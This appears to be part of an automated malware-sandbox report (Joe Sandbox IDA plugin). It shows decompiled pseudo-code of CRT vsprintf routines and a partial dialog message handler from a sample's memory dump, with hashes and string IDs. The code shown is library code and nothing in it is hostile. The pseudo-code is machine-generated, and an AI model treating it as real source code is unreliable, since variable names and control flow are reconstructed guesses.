                      • Instruction ID: 8fcb7fc3b4a47c6ffdbdca4d79617fd96c653ff58d8bc0d04c86f5eb3e458d48
                      • Opcode Fuzzy Hash: 846970c6e897798d1fe47f70cf7f594d770f8d1144d45daf0da9bd6b49569b5d
                      • Instruction Fuzzy Hash: 1611D23560010CEBCB04FFA6D9A2AAD7B79AF84351F104476BD06AB295DF30AE44DF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E0096D580(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				char _v1120;
                      				signed int _v1124;
                      				char _v1128;
                      				signed int _v1132;
                      				signed int _v1136;
                      				char _v1140;
                      				char _v1144;
                      				intOrPtr _v1148;
                      				signed int _v1152;
                      				signed int _v1156;
                      				char _v1160;
                      				signed int _v1164;
                      				signed int _v1168;
                      				signed int _v1172;
                      				signed int _v1176;
                      				signed int _v1180;
                      				signed int _v1184;
                      				signed int _v1188;
                      				signed int _v1192;
                      				signed int _v1196;
                      				signed int _v1200;
                      				signed int _v1204;
                      				signed int _v1208;
                      				char _v1224;
                      				char _v1228;
                      				signed int _t127;
                      				void* _t135;
                      				signed int _t147;
                      				void* _t168;
                      				void* _t171;
                      				void* _t172;
                      				void* _t173;
                      				void* _t228;
                      				void* _t229;
                      				signed int _t233;
                      				void* _t234;
                      
                      				_t229 = __esi;
                      				_t228 = __edi;
                      				_t173 = __ecx;
                      				_t172 = __ebx;
                      				_t231 = _t233;
                      				_t234 = _t233 - 0x4c8;
                      				_t127 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t127 ^ _t233;
                      				if(_a20 == 0) {
                      					_v1144 = 0;
                      				} else {
                      					_v1144 = 1;
                      				}
                      				_v1148 = _v1144;
                      				_t239 = _v1148;
                      				if(_v1148 == 0) {
                      					_t171 = L00994930(_t239, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
                      					_t234 = _t234 + 0x18;
                      					if(_t171 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v1148 != 0) {
                      					__eflags = _a16;
                      					if(_a16 == 0) {
                      						L12:
                      						_v1152 = 1;
                      						L13:
                      						_v1156 = _v1152;
                      						__eflags = _v1156;
                      						if(__eflags == 0) {
                      							_t168 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
                      							_t234 = _t234 + 0x18;
                      							__eflags = _t168 - 1;
                      							if(_t168 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v1156;
                      						if(_v1156 != 0) {
                      							L00976CC0(_t172,  &_v1224, _t229, _a24);
                      							_v1140 = 0;
                      							_v1136 = 0;
                      							_v1132 = 0;
                      							_v1128 = 0;
                      							_v1140 = _a12;
                      							_v1136 = _a16;
                      							_v1132 = 0;
                      							_v1192 = _a4 & 0x00000002;
                      							_v1188 = _a8 & 0x00000000;
                      							__eflags = _v1192 | _v1188;
                      							if((_v1192 | _v1188) != 0) {
                      								L21:
                      								_v1160 = 1;
                      								L22:
                      								_v1128 = _v1160;
                      								_t135 = E00977A60( &_v1224);
                      								E00976BB0( &_v1120, E00976CA0( &_v1228,  &_v1140), _a4, _a8, _a20, _t135, _a28);
                      								_v1124 = E0097B870(_t172,  &_v1120, _t228, _t229);
                      								__eflags = _a12;
                      								if(_a12 != 0) {
                      									_v1200 = _a4 & 0x00000001;
                      									_v1196 = _a8 & 0x00000000;
                      									__eflags = _v1200 | _v1196;
                      									if((_v1200 | _v1196) == 0) {
                      										_t221 = _a4 & 0x00000002;
                      										_v1208 = _a4 & 0x00000002;
                      										_v1204 = _a8 & 0x00000000;
                      										__eflags = _v1208 | _v1204;
                      										if((_v1208 | _v1204) == 0) {
                      											__eflags = _a16;
                      											if(_a16 != 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													__eflags = 0;
                      													 *((short*)(_a12 + _v1132 * 2)) = 0;
                      													L48:
                      													_t221 = _v1124;
                      													_v1184 = _v1124;
                      													E009770D0( &_v1120);
                      													E00977230( &_v1224);
                      													_t147 = _v1184;
                      													goto L49;
                      												}
                      												_t221 = 0;
                      												 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
                      												_v1180 = 0xfffffffe;
                      												E009770D0( &_v1120);
                      												E00977230( &_v1224);
                      												_t147 = _v1180;
                      												goto L49;
                      											}
                      											_v1176 = 0xffffffff;
                      											E009770D0( &_v1120);
                      											E00977230( &_v1224);
                      											_t147 = _v1176;
                      											goto L49;
                      										}
                      										__eflags = _a16;
                      										if(_a16 != 0) {
                      											__eflags = _v1124;
                      											if(_v1124 >= 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													__eflags = 0;
                      													 *((short*)(_a12 + _v1132 * 2)) = 0;
                      												} else {
                      													 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
                      												}
                      											} else {
                      												 *_a12 = 0;
                      											}
                      										}
                      										goto L48;
                      									}
                      									__eflags = _a16;
                      									if(_a16 != 0) {
                      										L28:
                      										__eflags = _v1132 - _a16;
                      										if(_v1132 == _a16) {
                      											__eflags = _v1124;
                      											if(_v1124 < 0) {
                      												L33:
                      												goto L48;
                      											}
                      											__eflags = _v1124 - _a16;
                      											if(_v1124 <= _a16) {
                      												goto L33;
                      											}
                      											_v1172 = 0xffffffff;
                      											E009770D0( &_v1120);
                      											E00977230( &_v1224);
                      											_t147 = _v1172;
                      											goto L49;
                      										}
                      										 *((short*)(_a12 + _v1132 * 2)) = 0;
                      										goto L33;
                      									}
                      									__eflags = _v1124;
                      									if(_v1124 == 0) {
                      										goto L28;
                      									}
                      									_v1168 = 0xffffffff;
                      									E009770D0( &_v1120);
                      									E00977230( &_v1224);
                      									_t147 = _v1168;
                      									goto L49;
                      								}
                      								_t221 = _v1124;
                      								_v1164 = _v1124;
                      								E009770D0( &_v1120);
                      								E00977230( &_v1224);
                      								_t147 = _v1164;
                      								goto L49;
                      							}
                      							__eflags = _a12;
                      							if(_a12 == 0) {
                      								goto L21;
                      							}
                      							_v1160 = 0;
                      							goto L22;
                      						} else {
                      							 *((intOrPtr*)(L00992F70(_t173))) = 0x16;
                      							_t147 = E00992900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
                      							goto L49;
                      						}
                      					}
                      					__eflags = _a12;
                      					if(_a12 != 0) {
                      						goto L12;
                      					}
                      					_v1152 = 0;
                      					goto L13;
                      				} else {
                      					 *((intOrPtr*)(L00992F70(_t173))) = 0x16;
                      					_t147 = E00992900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
                      					L49:
                      					return E00957280(_t147, _t172, _v8 ^ _t231, _t221, _t228, _t229);
                      				}
                      			}









































                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0096D779
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 10a81fb5ff22bcb871d5f51474c600889a82d68f027f05682fc01f21e9186602
                      • Instruction ID: e0cd8076391816d6c1fdc575919ede59d88c1fdca7709564f659bc72dfc21636
                      • Opcode Fuzzy Hash: 10a81fb5ff22bcb871d5f51474c600889a82d68f027f05682fc01f21e9186602
                      • Instruction Fuzzy Hash: 3DC13DB0E062188BDB24DF14CC42BAEB3B4BF85314F1081D9E56D67291DB709E84CF6A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E0096D150(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				char _v1120;
                      				signed int _v1124;
                      				char _v1128;
                      				char _v1132;
                      				signed int _v1136;
                      				char _v1140;
                      				char _v1144;
                      				intOrPtr _v1148;
                      				signed int _v1152;
                      				signed int _v1156;
                      				char _v1160;
                      				signed int _v1164;
                      				signed int _v1168;
                      				signed int _v1172;
                      				signed int _v1176;
                      				signed int _v1180;
                      				signed int _v1184;
                      				signed int _v1188;
                      				signed int _v1192;
                      				signed int _v1196;
                      				signed int _v1200;
                      				signed int _v1204;
                      				signed int _v1208;
                      				char _v1224;
                      				char _v1228;
                      				signed int _t117;
                      				void* _t125;
                      				signed int _t138;
                      				void* _t155;
                      				void* _t158;
                      				void* _t159;
                      				void* _t160;
                      				void* _t210;
                      				void* _t211;
                      				signed int _t215;
                      				void* _t216;
                      
                      				_t211 = __esi;
                      				_t210 = __edi;
                      				_t160 = __ecx;
                      				_t159 = __ebx;
                      				_t213 = _t215;
                      				_t216 = _t215 - 0x4c8;
                      				_t117 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t117 ^ _t215;
                      				if(_a20 == 0) {
                      					_v1144 = 0;
                      				} else {
                      					_v1144 = 1;
                      				}
                      				_v1148 = _v1144;
                      				_t221 = _v1148;
                      				if(_v1148 == 0) {
                      					_t158 = L00994930(_t221, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
                      					_t216 = _t216 + 0x18;
                      					if(_t158 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v1148 != 0) {
                      					__eflags = _a16;
                      					if(_a16 == 0) {
                      						L12:
                      						_v1152 = 1;
                      						L13:
                      						_v1156 = _v1152;
                      						__eflags = _v1156;
                      						if(__eflags == 0) {
                      							_t155 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
                      							_t216 = _t216 + 0x18;
                      							__eflags = _t155 - 1;
                      							if(_t155 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v1156;
                      						if(_v1156 != 0) {
                      							L00976CC0(_t159,  &_v1224, _t211, _a24);
                      							_v1140 = 0;
                      							_v1136 = 0;
                      							_v1132 = 0;
                      							_v1128 = 0;
                      							_v1140 = _a12;
                      							_v1136 = _a16;
                      							_v1132 = 0;
                      							_v1192 = _a4 & 0x00000002;
                      							_v1188 = _a8 & 0x00000000;
                      							__eflags = _v1192 | _v1188;
                      							if((_v1192 | _v1188) != 0) {
                      								L21:
                      								_v1160 = 1;
                      								L22:
                      								_v1128 = _v1160;
                      								_t125 = E00977A60( &_v1224);
                      								E00976A90( &_v1120, E00976C80( &_v1228,  &_v1140), _a4, _a8, _a20, _t125, _a28);
                      								_v1124 = E0097A850( &_v1120);
                      								__eflags = _a12;
                      								if(_a12 != 0) {
                      									_v1200 = _a4 & 0x00000001;
                      									_v1196 = _a8 & 0x00000000;
                      									__eflags = _v1200 | _v1196;
                      									if((_v1200 | _v1196) == 0) {
                      										_v1208 = _a4 & 0x00000002;
                      										_v1204 = _a8 & 0x00000000;
                      										_t207 = _v1208 | _v1204;
                      										__eflags = _v1208 | _v1204;
                      										if((_v1208 | _v1204) == 0) {
                      											__eflags = _a16;
                      											if(_a16 != 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													_t207 = _a12 + _v1132;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      													L48:
                      													_v1184 = _v1124;
                      													E00977010( &_v1120);
                      													E00977230( &_v1224);
                      													_t138 = _v1184;
                      													goto L49;
                      												}
                      												 *((char*)(_a12 + _a16 - 1)) = 0;
                      												_v1180 = 0xfffffffe;
                      												E00977010( &_v1120);
                      												E00977230( &_v1224);
                      												_t138 = _v1180;
                      												goto L49;
                      											}
                      											_v1176 = 0xffffffff;
                      											E00977010( &_v1120);
                      											E00977230( &_v1224);
                      											_t138 = _v1176;
                      											goto L49;
                      										}
                      										__eflags = _a16;
                      										if(_a16 != 0) {
                      											__eflags = _v1124;
                      											if(_v1124 >= 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													_t207 = _a12 + _v1132;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      												} else {
                      													 *((char*)(_a12 + _a16 - 1)) = 0;
                      												}
                      											} else {
                      												_t207 = _a12;
                      												 *_a12 = 0;
                      											}
                      										}
                      										goto L48;
                      									}
                      									__eflags = _a16;
                      									if(_a16 != 0) {
                      										L28:
                      										__eflags = _v1132 - _a16;
                      										if(_v1132 == _a16) {
                      											__eflags = _v1124;
                      											if(_v1124 < 0) {
                      												L33:
                      												goto L48;
                      											}
                      											_t207 = _v1124;
                      											__eflags = _v1124 - _a16;
                      											if(_v1124 <= _a16) {
                      												goto L33;
                      											}
                      											_v1172 = 0xffffffff;
                      											E00977010( &_v1120);
                      											E00977230( &_v1224);
                      											_t138 = _v1172;
                      											goto L49;
                      										}
                      										 *(_a12 + _v1132) = 0;
                      										goto L33;
                      									}
                      									__eflags = _v1124;
                      									if(_v1124 == 0) {
                      										goto L28;
                      									}
                      									_v1168 = 0xffffffff;
                      									E00977010( &_v1120);
                      									E00977230( &_v1224);
                      									_t138 = _v1168;
                      									goto L49;
                      								}
                      								_t207 = _v1124;
                      								_v1164 = _v1124;
                      								E00977010( &_v1120);
                      								E00977230( &_v1224);
                      								_t138 = _v1164;
                      								goto L49;
                      							}
                      							__eflags = _a12;
                      							if(_a12 == 0) {
                      								goto L21;
                      							}
                      							_v1160 = 0;
                      							goto L22;
                      						} else {
                      							 *((intOrPtr*)(L00992F70(_t160))) = 0x16;
                      							_t138 = E00992900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
                      							goto L49;
                      						}
                      					}
                      					__eflags = _a12;
                      					if(_a12 != 0) {
                      						goto L12;
                      					}
                      					_v1152 = 0;
                      					goto L13;
                      				} else {
                      					 *((intOrPtr*)(L00992F70(_t160))) = 0x16;
                      					_t138 = E00992900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
                      					L49:
                      					return E00957280(_t138, _t159, _v8 ^ _t213, _t207, _t210, _t211);
                      				}
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0096D349
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: a8b2751cbc9371cdbc0027d4b15dbe17aa0c214961a3c06402d7ae08121e1380
                      • Instruction ID: e9715b5f1d76d4202145de2c9012717821b61130e5a0c86b3e321131e302b763
                      • Opcode Fuzzy Hash: a8b2751cbc9371cdbc0027d4b15dbe17aa0c214961a3c06402d7ae08121e1380
                      • Instruction Fuzzy Hash: 45C14EB0E05218CBDB24DF14CC91B9EB7B4BB81314F1085D9E52D67292DB74AE84CF5A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E0096E250(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				char _v1120;
                      				signed int _v1124;
                      				char _v1128;
                      				char _v1132;
                      				signed int _v1136;
                      				char _v1140;
                      				char _v1144;
                      				intOrPtr _v1148;
                      				signed int _v1152;
                      				signed int _v1156;
                      				char _v1160;
                      				signed int _v1164;
                      				signed int _v1168;
                      				signed int _v1172;
                      				signed int _v1176;
                      				signed int _v1180;
                      				signed int _v1184;
                      				signed int _v1188;
                      				signed int _v1192;
                      				signed int _v1196;
                      				signed int _v1200;
                      				signed int _v1204;
                      				signed int _v1208;
                      				char _v1224;
                      				char _v1228;
                      				signed int _t117;
                      				void* _t125;
                      				signed int _t138;
                      				void* _t155;
                      				void* _t158;
                      				void* _t159;
                      				void* _t160;
                      				void* _t210;
                      				void* _t211;
                      				signed int _t215;
                      				void* _t216;
                      
                      				_t211 = __esi;
                      				_t210 = __edi;
                      				_t160 = __ecx;
                      				_t159 = __ebx;
                      				_t213 = _t215;
                      				_t216 = _t215 - 0x4c8;
                      				_t117 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t117 ^ _t215;
                      				if(_a20 == 0) {
                      					_v1144 = 0;
                      				} else {
                      					_v1144 = 1;
                      				}
                      				_v1148 = _v1144;
                      				_t221 = _v1148;
                      				if(_v1148 == 0) {
                      					_t158 = L00994930(_t221, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
                      					_t216 = _t216 + 0x18;
                      					if(_t158 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v1148 != 0) {
                      					__eflags = _a16;
                      					if(_a16 == 0) {
                      						L12:
                      						_v1152 = 1;
                      						L13:
                      						_v1156 = _v1152;
                      						__eflags = _v1156;
                      						if(__eflags == 0) {
                      							_t155 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
                      							_t216 = _t216 + 0x18;
                      							__eflags = _t155 - 1;
                      							if(_t155 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v1156;
                      						if(_v1156 != 0) {
                      							L00976CC0(_t159,  &_v1224, _t211, _a24);
                      							_v1140 = 0;
                      							_v1136 = 0;
                      							_v1132 = 0;
                      							_v1128 = 0;
                      							_v1140 = _a12;
                      							_v1136 = _a16;
                      							_v1132 = 0;
                      							_v1192 = _a4 & 0x00000002;
                      							_v1188 = _a8 & 0x00000000;
                      							__eflags = _v1192 | _v1188;
                      							if((_v1192 | _v1188) != 0) {
                      								L21:
                      								_v1160 = 1;
                      								L22:
                      								_v1128 = _v1160;
                      								_t125 = E00977A60( &_v1224);
                      								E00976AF0( &_v1120, E00976C80( &_v1228,  &_v1140), _a4, _a8, _a20, _t125, _a28);
                      								_v1124 = E0097ADB0( &_v1120);
                      								__eflags = _a12;
                      								if(_a12 != 0) {
                      									_v1200 = _a4 & 0x00000001;
                      									_v1196 = _a8 & 0x00000000;
                      									__eflags = _v1200 | _v1196;
                      									if((_v1200 | _v1196) == 0) {
                      										_v1208 = _a4 & 0x00000002;
                      										_v1204 = _a8 & 0x00000000;
                      										_t207 = _v1208 | _v1204;
                      										__eflags = _v1208 | _v1204;
                      										if((_v1208 | _v1204) == 0) {
                      											__eflags = _a16;
                      											if(_a16 != 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													_t207 = _a12 + _v1132;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      													L48:
                      													_v1184 = _v1124;
                      													E00977050( &_v1120);
                      													E00977230( &_v1224);
                      													_t138 = _v1184;
                      													goto L49;
                      												}
                      												 *((char*)(_a12 + _a16 - 1)) = 0;
                      												_v1180 = 0xfffffffe;
                      												E00977050( &_v1120);
                      												E00977230( &_v1224);
                      												_t138 = _v1180;
                      												goto L49;
                      											}
                      											_v1176 = 0xffffffff;
                      											E00977050( &_v1120);
                      											E00977230( &_v1224);
                      											_t138 = _v1176;
                      											goto L49;
                      										}
                      										__eflags = _a16;
                      										if(_a16 != 0) {
                      											__eflags = _v1124;
                      											if(_v1124 >= 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													_t207 = _a12 + _v1132;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      												} else {
                      													 *((char*)(_a12 + _a16 - 1)) = 0;
                      												}
                      											} else {
                      												_t207 = _a12;
                      												 *_a12 = 0;
                      											}
                      										}
                      										goto L48;
                      									}
                      									__eflags = _a16;
                      									if(_a16 != 0) {
                      										L28:
                      										__eflags = _v1132 - _a16;
                      										if(_v1132 == _a16) {
                      											__eflags = _v1124;
                      											if(_v1124 < 0) {
                      												L33:
                      												goto L48;
                      											}
                      											_t207 = _v1124;
                      											__eflags = _v1124 - _a16;
                      											if(_v1124 <= _a16) {
                      												goto L33;
                      											}
                      											_v1172 = 0xffffffff;
                      											E00977050( &_v1120);
                      											E00977230( &_v1224);
                      											_t138 = _v1172;
                      											goto L49;
                      										}
                      										 *(_a12 + _v1132) = 0;
                      										goto L33;
                      									}
                      									__eflags = _v1124;
                      									if(_v1124 == 0) {
                      										goto L28;
                      									}
                      									_v1168 = 0xffffffff;
                      									E00977050( &_v1120);
                      									E00977230( &_v1224);
                      									_t138 = _v1168;
                      									goto L49;
                      								}
                      								_t207 = _v1124;
                      								_v1164 = _v1124;
                      								E00977050( &_v1120);
                      								E00977230( &_v1224);
                      								_t138 = _v1164;
                      								goto L49;
                      							}
                      							__eflags = _a12;
                      							if(_a12 == 0) {
                      								goto L21;
                      							}
                      							_v1160 = 0;
                      							goto L22;
                      						} else {
                      							 *((intOrPtr*)(L00992F70(_t160))) = 0x16;
                      							_t138 = E00992900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
                      							goto L49;
                      						}
                      					}
                      					__eflags = _a12;
                      					if(_a12 != 0) {
                      						goto L12;
                      					}
                      					_v1152 = 0;
                      					goto L13;
                      				} else {
                      					 *((intOrPtr*)(L00992F70(_t160))) = 0x16;
                      					_t138 = E00992900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
                      					L49:
                      					return E00957280(_t138, _t159, _v8 ^ _t213, _t207, _t210, _t211);
                      				}
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0096E449
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 7f2c26ebb2b830a68f9af450275cb50369f07414b9b6beb1e313dd1e83e75cac
                      • Instruction ID: 304808cd7883eaba25a83749c81bfe9a3195a19131b931ec211e1670b8f50980
                      • Opcode Fuzzy Hash: 7f2c26ebb2b830a68f9af450275cb50369f07414b9b6beb1e313dd1e83e75cac
                      • Instruction Fuzzy Hash: 18C149B4944218CBDF24DF14CC91BAEB7B4BB91318F1081D9E61D67282DB749E84CF6A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00955360(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
                      				char _v8;
                      				char _v12;
                      				char _v16;
                      				char _v20;
                      				char _v24;
                      				char _v28;
                      				char _v32;
                      				intOrPtr _t86;
                      				void* _t88;
                      				void* _t93;
                      				void* _t101;
                      				void* _t109;
                      				void* _t115;
                      				void* _t117;
                      				void* _t120;
                      				signed int _t160;
                      				void* _t181;
                      				void* _t182;
                      
                      				_t180 = __esi;
                      				_t179 = __edi;
                      				_t160 = __edx;
                      				_t121 = __ebx;
                      				_v32 = 0xcccccccc;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_v16 = 1;
                      				_v32 = _a24;
                      				_t184 = _v32;
                      				if(_v32 == 0) {
                      					__eflags = _a8 - 0x110;
                      					if(__eflags != 0) {
                      						L5:
                      						__eflags = _a8 - 0x111;
                      						if(_a8 != 0x111) {
                      							L9:
                      							__eflags = _a8 - 0x111;
                      							if(_a8 != 0x111) {
                      								L13:
                      								__eflags = _a8 - 0x111;
                      								if(_a8 != 0x111) {
                      									L17:
                      									__eflags = _a8 - 0x111;
                      									if(_a8 != 0x111) {
                      										L21:
                      										__eflags = _a8 - 0x111;
                      										if(_a8 != 0x111) {
                      											L25:
                      											__eflags = _a8 - 0x111;
                      											if(_a8 != 0x111) {
                      												L29:
                      												L33:
                      												_t86 = 0;
                      												L34:
                      												_push(_t160);
                      												E009D14C0(_t181, 0x955684);
                      												_t88 = _t86;
                      												return E009D1520(_t88, _t181 - _t182 + 0x1c);
                      											}
                      											_t160 = _a12 & 0x0000ffff;
                      											__eflags = (_t160 & 0x0000ffff) - 0xd2;
                      											if(__eflags != 0) {
                      												goto L29;
                      											}
                      											_v16 = 1;
                      											_t93 = E009D0980(_t121, _v8, _a16, _t179, _t180, __eflags, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
                      											_t160 = _a20;
                      											 *_t160 = _t93;
                      											__eflags = _v16;
                      											if(_v16 == 0) {
                      												goto L29;
                      											}
                      											_t86 = 1;
                      											goto L34;
                      										}
                      										__eflags = (_a12 & 0xffff) - 0xd4;
                      										if(__eflags != 0) {
                      											goto L25;
                      										}
                      										_v16 = 1;
                      										_t160 = _a12 >> 0x00000010 & 0x0000ffff;
                      										 *_a20 = E009D0840(_t121, _v8, _t160, _t179, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
                      										__eflags = _v16;
                      										if(_v16 == 0) {
                      											goto L25;
                      										}
                      										_t86 = 1;
                      										goto L34;
                      									}
                      									_t160 = _a12 & 0x0000ffff;
                      									__eflags = (_t160 & 0x0000ffff) - 0xd3;
                      									if(__eflags != 0) {
                      										goto L21;
                      									}
                      									_v16 = 1;
                      									_t101 = E009D0AC0(_t121, _v8, _a16, _t179, _t180, __eflags, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
                      									_t160 = _a20;
                      									 *_t160 = _t101;
                      									__eflags = _v16;
                      									if(_v16 == 0) {
                      										goto L21;
                      									}
                      									_t86 = 1;
                      									goto L34;
                      								}
                      								__eflags = (_a12 & 0xffff) - 0xd1;
                      								if(__eflags != 0) {
                      									goto L17;
                      								}
                      								_v16 = 1;
                      								_t160 = _a12 >> 0x00000010 & 0x0000ffff;
                      								 *_a20 = E009D0C00(_t121, _v8, _t160, _t179, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
                      								__eflags = _v16;
                      								if(_v16 == 0) {
                      									goto L17;
                      								}
                      								_t86 = 1;
                      								goto L34;
                      							}
                      							_t160 = _a12 & 0x0000ffff;
                      							__eflags = (_t160 & 0x0000ffff) - 2;
                      							if((_t160 & 0x0000ffff) != 2) {
                      								goto L13;
                      							}
                      							_v16 = 1;
                      							_t109 = E009D0D40(_v8, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
                      							_t160 = _a20;
                      							 *_t160 = _t109;
